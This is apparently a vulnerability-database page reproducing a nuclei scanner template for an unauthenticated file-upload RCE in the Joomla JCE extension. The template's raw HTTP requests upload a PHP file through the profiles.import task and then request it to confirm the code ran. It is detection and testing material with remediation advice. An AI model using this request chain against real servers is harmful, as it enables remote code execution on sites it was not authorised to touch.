Lucene search
K

Joomla! JCE extension < 2.9.99.5 unauthenticated RCE

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

Joomla JCE extension below 2.9.99.5 allows unauthenticated remote code execution via file upload.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-48907
9 Jun 202616:30
githubexploit
GithubExploit
COM_JCE_VANDA
29 Jun 202611:00
githubexploit
GithubExploit
Exploit for Improper Access Control in Widgetfactorylimited Jce
22 Jun 202618:31
githubexploit
GithubExploit
Exploit for CVE-2026-48907
11 Jun 202613:14
githubexploit
GithubExploit
Exploit for Improper Access Control in Widgetfactorylimited Jce
29 Jun 202606:36
githubexploit
GithubExploit
Exploit for CVE-2026-48907
12 Jun 202609:22
githubexploit
GithubExploit
Exploit for Improper Access Control in Widgetfactorylimited Jce
27 Jun 202604:48
githubexploit
GithubExploit
Exploit for Improper Access Control in Widgetfactorylimited Jce
29 Jun 202621:14
githubexploit
GithubExploit
Exploit for Improper Access Control in Widgetfactorylimited Jce
1 Jul 202614:05
githubexploit
GithubExploit
JoomlaSniper
12 Jun 202608:12
githubexploit
Rows per page
id: CVE-2026-48907
info:
  name: Joomla! JCE extension < 2.9.99.5 unauthenticated RCE
  author: ywh-jfellus
  severity: critical
  description: |
    Joomla JCE editor extension contains an unrestricted file upload vulnerability caused by allowing unauthenticated users to create new editor profiles, letting attackers upload and execute PHP code remotely, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can upload and execute arbitrary PHP code, leading to full remote code execution on the server.
  remediation: |
    Update to the latest version of the JCE editor extension.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-48907
    - https://github.com/advisories/GHSA-c3f5-4g7f-qjqj
    - https://www.joomlacontenteditor.net/support/changelog/editor
    - https://github.com/ywh-jfellus/CVE-2026-48907
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2026-48907
    epss-score: 0.80425
    epss-percentile: 0.99572
    cwe-id: CWE-284
  metadata:
    verified: true
    max-request: 3
    vendor: joomlacontenteditor
    product: jce
    shodan-query: http.component:"Joomla"
    fofa-query: app="Joomla"
  tags: cve,cve2026,joomla,jce,rce,unauth,intrusive,unauth,vkev,kev

variables:
  payload: "<?= 45*69 ?>"
  tmp_file: "{{'nuclei-' + md5(Hostname + 'phuJ4OoP')}}.xml.php"

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - 'contains(body, "Joomla")'
          - 'contains(body, "csrf.token")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: csrf_token
        part: body
        group: 1
        internal: true
        regex:
          - '"csrf\.token"\s*:\s*"([a-f0-9]{32})"'

  - raw:
      - |
        POST /index.php?option=com_jce HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=66dea244639dd05378afdad58c2c9c1d

        --66dea244639dd05378afdad58c2c9c1d
        Content-Disposition: form-data; name="task"

        profiles.import
        --66dea244639dd05378afdad58c2c9c1d
        Content-Disposition: form-data; name="{{csrf_token}}"

        1
        --66dea244639dd05378afdad58c2c9c1d
        Content-Disposition: form-data; name="profile_file"; filename="{{tmp_file}}"
        Content-Type: application/xml

        {{payload}}
        --66dea244639dd05378afdad58c2c9c1d--

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - 'contains(body, "success")'
        condition: and
        internal: true

  - raw:
      - |
        GET /tmp/{{tmp_file}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "3105"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220467e4c4ec5674bb9f5f6bd56c1ec010592b38241ce10b5c2e092aa4a0ce7dab5022100ea3af7bc676cffaaf16fe493078b68750143d3477c38e1bd737bf7002d3f0ab8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Jun 2026 15:38Current
7.7High risk
Vulners AI Score7.7
CVSS 3.19.8
CVSS 410
EPSS0.80425
SSVC
16